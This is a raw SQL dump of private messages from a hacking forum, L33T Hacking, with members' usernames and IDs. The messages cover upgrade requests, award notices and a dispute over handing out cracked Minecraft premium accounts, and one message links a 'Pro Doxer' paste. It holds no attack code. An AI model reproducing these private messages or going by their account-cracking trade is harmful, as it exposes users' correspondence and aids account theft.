THREADS from ubers to your forum and remain more active here..\r\n\r\nThe reason is that recently Crazy4cs (admin and owner of ubers) made it so that only upgraded members (that\'s like 15 dollars) can edit posts and threads and normal users can\'t\r\n\r\nUbers is all about money now , i id rather be a part of this community instead of ubers\r\n\r\nHow about it then? i can bring alot of Quality to this place i guarantee you , also you said free upgrade :)\r\n[/quote]\r\n\r\n\r\nSure that would be great but before we upgrade someone we now require two HQ threads. \r\n[/quote]\r\n\r\nAlready Done!! , i posted 4 HQ tuts 2 extra :) :\r\n\r\nhttp://l33thacking.net/thread-987.html\r\n\r\nhttp://l33thacking.net/thread-988.html\r\n\r\nhttp://l33thacking.net/thread-989.html\r\n\r\nhttp://l33thacking.net/thread-990.html\r\n[/quote]\r\n\r\nI\'ll do it when I get back home, just PM me back so when I check my PMs I know that I have to upgrade your account.\r\n[/quote]\r\n\r\nAlright great!! If you see this PM then be sure to upgrade me mate! :D\r\n[/quote]\r\n\r\nDone.', '1350751959', '0', '3', '1350754341', '1', '0', '0', '1350754294'); INSERT INTO mybb_privatemessages VALUES('3506', '270', '270', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"270\";}}', '1', 'Hi there.', '0', 'Hi,\r\n\r\nHow are you today? If you haven\'t received this PM yet, then how do you find L33T Hacking so far? Feel free to share your experience, ideas, feedback anything you like.', '1350752680', '0', '3', '1350755301', '1', '0', '0', '1350755230'); INSERT INTO mybb_privatemessages VALUES('3507', '228', '228', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Thread', '0', 'I want to post a thread but thought if you would post it then you would post it then you would get more threads.\r\n\r\nPost this in the off topic section.\r\n\r\nShould I implement myawards plugin which can take up to weeks or should I install my achievements and all the previous awards given would be gone.\r\n\r\nSay that Jok3r told you to post this thread and it\'s an official award system discussion thread. ', '1350753179', '0', '3', '1350755003', '1', '0', '0', '1350754640'); INSERT INTO mybb_privatemessages VALUES('3656', '258', '258', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]PiXEL^OG[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Elite\r\nDescription: Special Award to signify Elite Status\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1350862283', '0', '1', '0', '1', '0', '0', '1350892664'); INSERT INTO mybb_privatemessages VALUES('3657', '255', '255', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"255\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]sbhshroy2[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Elite\r\nDescription: Special Award to signify Elite Status\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1350862293', '0', '1', '0', '1', '0', '0', '1350900459'); INSERT INTO mybb_privatemessages VALUES('3764', '222', '222', '5', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'Pro Doxer- NSA', '0', 'http://pastebin.com/eXVxALWX', '1351043710', '0', '3', '1351044139', '1', '0', '0', '1351044047'); INSERT INTO mybb_privatemessages VALUES('3765', '5', '5', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '1', 'Re: Pro Doxer- NSA', '0', '[quote=\'Timmy\']\r\nhttp://pastebin.com/eXVxALWX\r\n[/quote]\r\n\r\nLmao...who is this...and yeh if you got this ur good :D', '1351044139', '0', '3', '1351044345', '1', '0', '2', '1351044242'); INSERT INTO mybb_privatemessages VALUES('3766', '222', '5', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"5\";}}', '2', 'Re: Pro Doxer- NSA', '0', '[quote=\'Timmy\']\r\nhttp://pastebin.com/eXVxALWX\r\n[/quote]\r\n\r\nLmao...who is this...and yeh if you got this ur good :D', '1351044139', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3659', '222', '222', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]ƒ???????????g[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Elite\r\nDescription: Special Award to signify Elite Status\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1350862325', '0', '1', '0', '1', '0', '0', '1350862447'); INSERT INTO mybb_privatemessages VALUES('3660', '100', '100', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]??zg???g????61[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Elite\r\nDescription: Special Award to signify Elite Status\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1350862336', '0', '1', '0', '1', '0', '0', '1350863021'); INSERT INTO mybb_privatemessages VALUES('3509', '258', '1', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Forum', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\nOk mate i registered , if possible i would like to be Moderator or Staff at your forum :)\r\n\r\nIm Deltaforce fromm Ubers.org : http://www.ubers.org/member.php?action=profile&uid=7852\r\n\r\nI have had experience being moderator before at a hacking forum called Eliteguys\r\n\r\nHere is my eliteguys profile : http://www.eliteguys.org/User-XTr3ME-PiX3L\r\n\r\nAs you can see im mod there and i can help your forum grow so i would like to be Moderator or Staff on L33T Hacking :D I swear you will not regret it. I can post MANY HQ stuff there\r\n\r\nhere is my profile on L33T HACKING : http://l33thacking.net/user-258.html\r\n\r\nLooking forward to hearing from you \r\n[/quote]\r\n\r\nhttp://l33thacking.net/misc.php?action=help&hid=17\r\n\r\n\r\n[/quote]\r\n\r\nOk i understand , How about a free upgrade then?\r\n\r\nYou said on ubers that you will provide a free upgrade (VIP membership) if we are active here on this forum\r\n\r\nI am willing to move ALL MY HQ THREADS from ubers to your forum and remain more active here..\r\n\r\nThe reason is that recently Crazy4cs (admin and owner of ubers) made it so that only upgraded members (that\'s like 15 dollars) can edit posts and threads and normal users can\'t\r\n\r\nUbers is all about money now , i id rather be a part of this community instead of ubers\r\n\r\nHow about it then? i can bring alot of Quality to this place i guarantee you , also you said free upgrade :)\r\n[/quote]\r\n\r\n\r\nSure that would be great but before we upgrade someone we now require two HQ threads. \r\n[/quote]\r\n\r\nAlready Done!! , i posted 4 HQ tuts 2 extra :) :\r\n\r\nhttp://l33thacking.net/thread-987.html\r\n\r\nhttp://l33thacking.net/thread-988.html\r\n\r\nhttp://l33thacking.net/thread-989.html\r\n\r\nhttp://l33thacking.net/thread-990.html\r\n[/quote]\r\n\r\nI\'ll do it when I get back home, just PM me back so when I check my PMs I know that I have to upgrade your account.\r\n[/quote]\r\n\r\nAlright great!! If you see this PM then be sure to upgrade me mate! :D\r\n[/quote]\r\n\r\nDone.\r\n[/quote]\r\n\r\nThanks mate!! :) Gonna be posting quite alot 2morrow (its mid night where im at atm)', '1350754341', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3655', '205', '205', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"205\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]mothered[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Elite\r\nDescription: Special Award to signify Elite Status\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1350862214', '0', '1', '0', '1', '0', '0', '1350872081'); INSERT INTO mybb_privatemessages VALUES('3511', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Thread', '0', '[quote=\'t3h jok3r\']\r\nI want to post a thread but thought if you would post it then you would post it then you would get more threads.\r\n\r\nPost this in the off topic section.\r\n\r\nShould I implement myawards plugin which can take up to weeks or should I install my achievements and all the previous awards given would be gone.\r\n\r\nSay that Jok3r told you to post this thread and it\'s an official award system discussion thread. \r\n[/quote]\r\n\r\nThanks Man <3\r\n\r\nWhat do you think?: http://l33thacking.net/thread-1014.html', '1350755003', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3654', '67', '67', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"67\";}}', '1', 'You have been granted an award.', '0', 'Hi [b]HoverCatz[/b] You have been granted an award on [url=http://l33thacking.net][b]L33T Hacking[/b][/url] We thank you to not respond to this PM.\r\n\r\n-----------------------------\r\n\r\nName of award: Elite\r\nDescription: Special Award to signify Elite Status\r\n\r\n-----------------------------\r\n\r\nThe award you have been given in an automatic way to remove it or hide it from your postbit / profile go to control panel and edit them.\r\n', '1350862204', '0', '1', '0', '1', '0', '0', '1351201954'); INSERT INTO mybb_privatemessages VALUES('3513', '270', '1', '270', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi there.', '0', '[quote=\'t3h jok3r\']\r\nHi,\r\n\r\nHow are you today? If you haven\'t received this PM yet, then how do you find L33T Hacking so far? Feel free to share your experience, ideas, feedback anything you like.\r\n[/quote]\r\nI\'m good. I think LH is awesome we just need a few more members. Can I suggest a dedicated tab to monetizing? I personally would want to make it as active as it can be; a few people know about what I love, and that is online monetizing.\r\n\r\nThanks! ', '1350755301', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3514', '228', '228', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '1', 'Re: Thread', '0', '[quote=\'VirtualLegend\']\r\n[quote=\'t3h jok3r\']\r\nI want to post a thread but thought if you would post it then you would post it then you would get more threads.\r\n\r\nPost this in the off topic section.\r\n\r\nShould I implement myawards plugin which can take up to weeks or should I install my achievements and all the previous awards given would be gone.\r\n\r\nSay that Jok3r told you to post this thread and it\'s an official award system discussion thread. \r\n[/quote]\r\n\r\nThanks Man <3\r\n\r\nWhat do you think?: http://l33thacking.net/thread-1014.html\r\n[/quote]\r\n\r\nNot bad.', '1350757405', '0', '1', '0', '1', '0', '0', '1350758082'); INSERT INTO mybb_privatemessages VALUES('3515', '258', '258', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '1', 'Re: Forum', '0', '[quote=\'XTr3ME PiX3L\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'XTr3ME PiX3L\']\r\nOk mate i registered , if possible i would like to be Moderator or Staff at your forum :)\r\n\r\nIm Deltaforce fromm Ubers.org : http://www.ubers.org/member.php?action=profile&uid=7852\r\n\r\nI have had experience being moderator before at a hacking forum called Eliteguys\r\n\r\nHere is my eliteguys profile : http://www.eliteguys.org/User-XTr3ME-PiX3L\r\n\r\nAs you can see im mod there and i can help your forum grow so i would like to be Moderator or Staff on L33T Hacking :D I swear you will not regret it. I can post MANY HQ stuff there\r\n\r\nhere is my profile on L33T HACKING : http://l33thacking.net/user-258.html\r\n\r\nLooking forward to hearing from you \r\n[/quote]\r\n\r\nhttp://l33thacking.net/misc.php?action=help&hid=17\r\n\r\n\r\n[/quote]\r\n\r\nOk i understand , How about a free upgrade then?\r\n\r\nYou said on ubers that you will provide a free upgrade (VIP membership) if we are active here on this forum\r\n\r\nI am willing to move ALL MY HQ THREADS from ubers to your forum and remain more active here..\r\n\r\nThe reason is that recently Crazy4cs (admin and owner of ubers) made it so that only upgraded members (that\'s like 15 dollars) can edit posts and threads and normal users can\'t\r\n\r\nUbers is all about money now , i id rather be a part of this community instead of ubers\r\n\r\nHow about it then? i can bring alot of Quality to this place i guarantee you , also you said free upgrade :)\r\n[/quote]\r\n\r\n\r\nSure that would be great but before we upgrade someone we now require two HQ threads. \r\n[/quote]\r\n\r\nAlready Done!! , i posted 4 HQ tuts 2 extra :) :\r\n\r\nhttp://l33thacking.net/thread-987.html\r\n\r\nhttp://l33thacking.net/thread-988.html\r\n\r\nhttp://l33thacking.net/thread-989.html\r\n\r\nhttp://l33thacking.net/thread-990.html\r\n[/quote]\r\n\r\nI\'ll do it when I get back home, just PM me back so when I check my PMs I know that I have to upgrade your account.\r\n[/quote]\r\n\r\nAlright great!! If you see this PM then be sure to upgrade me mate! :D\r\n[/quote]\r\n\r\nDone.\r\n[/quote]\r\n\r\nThanks mate!! :) Gonna be posting quite alot 2morrow (its mid night where im at atm)\r\n[/quote]\r\n\r\nThanks and Np.', '1350757468', '0', '1', '0', '1', '0', '0', '1350799628'); INSERT INTO mybb_privatemessages VALUES('3516', '270', '270', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"270\";}}', '1', 'Re: Hi there.', '0', '[quote=\'LCS\']\r\n[quote=\'t3h jok3r\']\r\nHi,\r\n\r\nHow are you today? If you haven\'t received this PM yet, then how do you find L33T Hacking so far? Feel free to share your experience, ideas, feedback anything you like.\r\n[/quote]\r\nI\'m good. I think LH is awesome we just need a few more members. Can I suggest a dedicated tab to monetizing? I personally would want to make it as active as it can be; a few people know about what I love, and that is online monetizing.\r\n\r\nThanks! \r\n[/quote]\r\n\r\nTrue and the thing is that the monetizing section is not that active at the moment but we would add one when we get more active members.', '1350757528', '0', '3', '1350774519', '1', '0', '0', '1350774429'); INSERT INTO mybb_privatemessages VALUES('3584', '258', '258', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '1', 'Re: hello', '0', '[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nwould you like a mc premium account \r\nregards me\r\n[/quote]\r\n\r\nNitro_Hitman gave them to you on Ubers\r\n\r\nHe gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it\r\n[/quote]\r\n\r\nexcuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype.\r\nso before you get on your high heels calm down,pfft accusing me of leaking ', '1350802268', '0', '3', '1350802645', '1', '0', '2', '1350802277'); INSERT INTO mybb_privatemessages VALUES('3575', '258', '258', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '1', 'hello', '0', 'would you like a mc premium account \r\nregards me', '1350801646', '0', '3', '1350802093', '1', '0', '2', '1350801992'); INSERT INTO mybb_privatemessages VALUES('3576', '257', '258', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '2', 'hello', '0', 'would you like a mc premium account \r\nregards me', '1350801646', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3583', '258', '257', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\nwould you like a mc premium account \r\nregards me\r\n[/quote]\r\n\r\nNitro_Hitman gave them to you on Ubers\r\n\r\nHe gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it', '1350802093', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3582', '257', '257', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\nwould you like a mc premium account \r\nregards me\r\n[/quote]\r\n\r\nNitro_Hitman gave them to you on Ubers\r\n\r\nHe gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it', '1350802093', '0', '3', '1350802268', '0', '0', '2', '1350802150'); INSERT INTO mybb_privatemessages VALUES('3585', '257', '258', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '2', 'Re: hello', '0', '[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nwould you like a mc premium account \r\nregards me\r\n[/quote]\r\n\r\nNitro_Hitman gave them to you on Ubers\r\n\r\nHe gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it\r\n[/quote]\r\n\r\nexcuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype.\r\nso before you get on your high heels calm down,pfft accusing me of leaking ', '1350802268', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3586', '257', '257', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nwould you like a mc premium account \r\nregards me\r\n[/quote]\r\n\r\nNitro_Hitman gave them to you on Ubers\r\n\r\nHe gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it\r\n[/quote]\r\n\r\nexcuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype.\r\nso before you get on your high heels calm down,pfft accusing me of leaking \r\n[/quote]\r\n\r\nO really? care to explain this? :\r\n\r\n[IMG]http://i.imgur.com/9PrGW.jpg[/IMG]\r\n\r\nWhy would your friends give away accounts to you? that makes no sense at all unless you have thousands of friends and they all have thousands of accounts to give away\r\n\r\n', '1350802645', '0', '3', '1350802966', '0', '0', '2', '1350802875'); INSERT INTO mybb_privatemessages VALUES('3587', '258', '257', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nwould you like a mc premium account \r\nregards me\r\n[/quote]\r\n\r\nNitro_Hitman gave them to you on Ubers\r\n\r\nHe gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it\r\n[/quote]\r\n\r\nexcuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype.\r\nso before you get on your high heels calm down,pfft accusing me of leaking \r\n[/quote]\r\n\r\nO really? care to explain this? :\r\n\r\n[IMG]http://i.imgur.com/9PrGW.jpg[/IMG]\r\n\r\nWhy would your friends give away accounts to you? that makes no sense at all unless you have thousands of friends and they all have thousands of accounts to give away\r\n\r\n', '1350802645', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3588', '258', '258', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '1', 'Re: hello', '0', '[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nwould you like a mc premium account \r\nregards me\r\n[/quote]\r\n\r\nNitro_Hitman gave them to you on Ubers\r\n\r\nHe gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it\r\n[/quote]\r\n\r\nexcuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype.\r\nso before you get on your high heels calm down,pfft accusing me of leaking \r\n[/quote]\r\n\r\nO really? care to explain this? :\r\n\r\n[IMG]http://i.imgur.com/9PrGW.jpg[/IMG]\r\n\r\nWhy would your friends give away accounts to you? that makes no sense at all unless you have thousands of friends and they all have thousands of accounts to give away\r\n\r\n\r\n[/quote]\r\n\r\nand i dont have thousands of freinds its called i\'v some freinds that give me heaps all the time.', '1350802966', '0', '3', '1350809638', '1', '0', '2', '1350809567'); INSERT INTO mybb_privatemessages VALUES('3589', '257', '258', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '2', 'Re: hello', '0', '[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nwould you like a mc premium account \r\nregards me\r\n[/quote]\r\n\r\nNitro_Hitman gave them to you on Ubers\r\n\r\nHe gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it\r\n[/quote]\r\n\r\nexcuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype.\r\nso before you get on your high heels calm down,pfft accusing me of leaking \r\n[/quote]\r\n\r\nO really? care to explain this? :\r\n\r\n[IMG]http://i.imgur.com/9PrGW.jpg[/IMG]\r\n\r\nWhy would your friends give away accounts to you? that makes no sense at all unless you have thousands of friends and they all have thousands of accounts to give away\r\n\r\n\r\n[/quote]\r\n\r\nand i dont have thousands of freinds its called i\'v some freinds that give me heaps all the time.', '1350802966', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3590', '53', '53', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '1', 'hey', '16', 'hey whats up.if you look on the who\'s online list its me and you and heaps of guest, why can\'t they just sign up', '1350805535', '0', '3', '1350814425', '1', '0', '2', '1350814401'); INSERT INTO mybb_privatemessages VALUES('3591', '257', '53', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'hey', '16', 'hey whats up.if you look on the who\'s online list its me and you and heaps of guest, why can\'t they just sign up', '1350805535', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3592', '257', '257', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nwould you like a mc premium account \r\nregards me\r\n[/quote]\r\n\r\nNitro_Hitman gave them to you on Ubers\r\n\r\nHe gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it\r\n[/quote]\r\n\r\nexcuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype.\r\nso before you get on your high heels calm down,pfft accusing me of leaking \r\n[/quote]\r\n\r\nO really? care to explain this? :\r\n\r\n[IMG]http://i.imgur.com/9PrGW.jpg[/IMG]\r\n\r\nWhy would your friends give away accounts to you? that makes no sense at all unless you have thousands of friends and they all have thousands of accounts to give away\r\n\r\n\r\n[/quote]\r\n\r\nand i dont have thousands of freinds its called i\'v some freinds that give me heaps all the time.\r\n[/quote]\r\n\r\nAnd why do they give you heaps all the time? EXACTLY!!! your story is a lie', '1350809638', '0', '3', '1350809876', '0', '0', '2', '1350809847'); INSERT INTO mybb_privatemessages VALUES('3593', '258', '257', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nwould you like a mc premium account \r\nregards me\r\n[/quote]\r\n\r\nNitro_Hitman gave them to you on Ubers\r\n\r\nHe gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it\r\n[/quote]\r\n\r\nexcuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype.\r\nso before you get on your high heels calm down,pfft accusing me of leaking \r\n[/quote]\r\n\r\nO really? care to explain this? :\r\n\r\n[IMG]http://i.imgur.com/9PrGW.jpg[/IMG]\r\n\r\nWhy would your friends give away accounts to you? that makes no sense at all unless you have thousands of friends and they all have thousands of accounts to give away\r\n\r\n\r\n[/quote]\r\n\r\nand i dont have thousands of freinds its called i\'v some freinds that give me heaps all the time.\r\n[/quote]\r\n\r\nAnd why do they give you heaps all the time? EXACTLY!!! your story is a lie', '1350809638', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3594', '258', '258', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '1', 'Re: hello', '0', '[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nwould you like a mc premium account \r\nregards me\r\n[/quote]\r\n\r\nNitro_Hitman gave them to you on Ubers\r\n\r\nHe gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it\r\n[/quote]\r\n\r\nexcuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype.\r\nso before you get on your high heels calm down,pfft accusing me of leaking \r\n[/quote]\r\n\r\nO really? care to explain this? :\r\n\r\n[IMG]http://i.imgur.com/9PrGW.jpg[/IMG]\r\n\r\nWhy would your friends give away accounts to you? that makes no sense at all unless you have thousands of friends and they all have thousands of accounts to give away\r\n\r\n\r\n[/quote]\r\n\r\nand i dont have thousands of freinds its called i\'v some freinds that give me heaps all the time.\r\n[/quote]\r\n\r\nAnd why do they give you heaps all the time? EXACTLY!!! your story is a lie\r\n[/quote]\r\n\r\nbecause they crack them for a living :O', '1350809876', '0', '3', '1350809955', '1', '0', '2', '1350809908'); INSERT INTO mybb_privatemessages VALUES('3595', '257', '258', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"258\";}}', '2', 'Re: hello', '0', '[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nwould you like a mc premium account \r\nregards me\r\n[/quote]\r\n\r\nNitro_Hitman gave them to you on Ubers\r\n\r\nHe gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it\r\n[/quote]\r\n\r\nexcuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype.\r\nso before you get on your high heels calm down,pfft accusing me of leaking \r\n[/quote]\r\n\r\nO really? care to explain this? :\r\n\r\n[IMG]http://i.imgur.com/9PrGW.jpg[/IMG]\r\n\r\nWhy would your friends give away accounts to you? that makes no sense at all unless you have thousands of friends and they all have thousands of accounts to give away\r\n\r\n\r\n[/quote]\r\n\r\nand i dont have thousands of freinds its called i\'v some freinds that give me heaps all the time.\r\n[/quote]\r\n\r\nAnd why do they give you heaps all the time? EXACTLY!!! your story is a lie\r\n[/quote]\r\n\r\nbecause they crack them for a living :O', '1350809876', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('3596', '257', '257', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '1', 'Re: hello', '0', '[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\n[quote=\'PiXEL^OG\']\r\n[quote=\'xEP1C_SC0P3Sx\']\r\nwould you like a mc premium account \r\nregards me\r\n[/quote]\r\n\r\nNitro_Hitman gave them to you on Ubers\r\n\r\nHe gave me 150 MC premium accounts , if you don\'t stop leaking i will tell Nitro_hitman and get you banned from Ubers because your leaking so stop it\r\n[/quote]\r\n\r\nexcuse me the one i was going to give to you wasnt from nitro hitman so im not leaking.iv got a tonne from my freinds on skype.\r\nso before you get on your high heels calm down,pfft accusing me of leaking \r\n[/quote]\r\n\r\nO really? care to explain this? :\r\n\r\n[IMG]http://i.imgur.com/9PrGW.jpg[/IMG]\r\n\r\nWhy would your friends give away accounts to you? that makes no sense at all unless you have thousands of friends and they all have thousands of accounts to give away\r\n\r\n\r\n[/quote]\r\n\r\nand i dont have thousands of freinds its called i\'v some freinds that give me heaps all the time.\r\n[/quote]\r\n\r\nAnd why do they give you heaps all the time? EXACTLY!!! your story is a lie\r\n[/quote]\r\n\r\nbecause they crack them for a living :O\r\n[/quote]\r\n\r\ni can\'t bother with this BS , do whatever you want but remember Karma bro', '1350809955', '0', '3', '1350810223', '0', '0', '2', '1350810130'); INSERT INTO mybb_privatemessages VALUES('3597', '258', '257', '258', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: hello', '0', 